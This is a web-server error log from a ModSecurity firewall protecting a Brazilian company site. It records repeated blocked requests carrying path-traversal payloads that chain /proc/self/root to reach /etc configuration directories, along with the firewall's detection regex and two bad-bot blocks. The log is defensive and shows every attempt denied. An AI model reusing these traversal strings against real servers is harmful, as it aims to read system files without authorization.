[Wed Mar 18 06:23:22.034963 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:34760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvCta6ubjKNq_cu4Zo-wAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:23:48.944871 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:36606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvJOw_le52K8_3pV2zZAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:24:37.576190 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:55852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvVcdf6f5d65gmYZSlogAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:26:01.951553 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:40428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvqeoXxyEfFpUF8f8_-QAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:26:07.261525 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.241.31:46890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvr0zinOy1jxa1j4fl1gAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:26:07.935478 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:58218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvr-yqAr6etmhZHNqO2AAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:26:09.674904 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:37242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvscdf6f5d65gmYZSlzAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:26:19.410972 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:58764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvu_u8EFLIOrSqIpvY-QAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:26:20.686702 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:41594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvvEzinOy1jxa1j4fl5AAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:26:24.172700 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:41596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpvwMdf6f5d65gmYZSl4QAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:26:57.516669 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:37242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpv4cdf6f5d65gmYZSmBgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:27:09.762462 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:55476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpv7eyqAr6etmhZHNqPAQAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:27:16.222645 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:33564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpv9NY0UrI5A3LftIxqfQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 06:27:23.461365 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:41608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpv-wkwaGbbGflqUZDjpgAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 06:27:31.955818 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:34712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwA9Y0UrI5A3LftIxqjwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:27:33.344614 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.228.61:57794] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpwBdY0UrI5A3LftIxqkQAAAYU"]
[Wed Mar 18 06:27:36.033239 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.244.43:45604] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpwCOw_le52K8_3pV2z3AAAAg4"]
[Wed Mar 18 06:27:44.551336 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:47784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwEPu8EFLIOrSqIpvZJgAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:27:44.699840 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:42348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwENY0UrI5A3LftIxqnwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:27:49.420130 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:34612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwFdY0UrI5A3LftIxqqAAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:28:22.474378 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:48048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwNgkwaGbbGflqUZDjzwAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:28:37.615120 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:38784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwRdY0UrI5A3LftIxq4QAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 06:28:46.533563 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:60024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwTuoXxyEfFpUF8f9ASAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:29:03.136147 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:35892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpwX-w_le52K8_3pV20DwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
